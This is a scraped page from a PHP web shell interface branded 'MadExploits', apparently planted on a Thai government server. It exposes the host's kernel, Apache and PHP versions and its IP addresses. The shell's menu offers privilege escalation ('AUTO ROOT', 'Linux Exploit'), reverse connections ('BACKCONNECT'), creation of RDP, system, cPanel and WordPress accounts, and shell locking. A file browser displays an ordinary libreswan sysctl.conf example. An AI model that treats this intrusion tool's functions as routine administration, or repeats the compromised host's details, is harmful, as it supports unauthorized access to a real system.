Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libreswan-3.15 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
hub-spoke.conf
1.47
KB
-rw-r--r--
ipv6.conf
1013
B
-rw-r--r--
l2tp-cert.conf
1.69
KB
-rw-r--r--
l2tp-psk.conf
1.78
KB
-rw-r--r--
linux-linux.conf
1.13
KB
-rw-r--r--
mast-l2tp-psk.conf
1.54
KB
-rw-r--r--
oe-authnull.conf
1.44
KB
-rw-r--r--
oe-exclude-dns.conf
235
B
-rw-r--r--
oe-upgrade-authnull.conf
1.52
KB
-rw-r--r--
sysctl.conf
2.18
KB
-rw-r--r--
xauth.conf
622
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sysctl.conf
# example entries for /etc/sysctl.conf # forwarding is needed for subnet or l2tp connections net.ipv4.ip_forward = 1 # rp_filter protects against packets "appearing out of nowhere". It is not # always clear to the kernel that a packet appeared as a result of decryption. # One such case is using KLIPS or MAST IPsec stacks, as they receive on one # interface but inject the packet on another interface. Another known case is # "appendix mode" using the XFRM/NETKEY stack. Here, packets are receiving, # decrypted and sent onwards on the same single interface. (these can also cause # bad redirects, see below net.ipv4.conf.default.rp_filter = 0 net.ipv4.conf.all.rp_filter = 0 # when using 1 interface for two networks when using NETKEY, the kernel # kernel thinks it can be clever by sending a redirect (cause it cannot # tell an encrypted packet came in, but a decrypted packet came out), # so it sends a bogus ICMP redirect net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 net.ipv4.icmp_ignore_bogus_error_responses = 1 net.ipv4.conf.default.log_martians = 0 net.ipv4.conf.all.log_martians = 0 # seems the martian settings are not always enough. If not receiving packets # try running this: # for n in eth0 mast0 ipsec0 ipsec1 all default ; do # sysctl net.ipv4.conf.$n.rp_filter=0; # done # # these are non-ipsec specific security policies you should use net.ipv4.conf.default.accept_source_route = 0 net.ipv6.conf.default.accept_source_route = 0 net.ipv4.conf.all.accept_redirects = 0 net.ipv6.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv6.conf.default.accept_redirects = 0 # When using KLIPS in some situations, you will see errors like: # [ 8648.409997] __ratelimit: 168 messages suppressed # [ 8648.410009] Neighbour table overflow. # Especially when on large cable networks, though we've also # seen it when using combinations of xen/bridging/VM's. # If you do, and you are SURE there are no routing loops, # you can try these below: # net.ipv4.neigh.default.gc_thresh1 = 1024 net.ipv4.neigh.default.gc_thresh2 = 2048 net.ipv4.neigh.default.gc_thresh3 = 4096 # for enableing core dumps, see # http://fcp.surfsite.org/modules/smartfaq/faq.php?faqid=2746
Close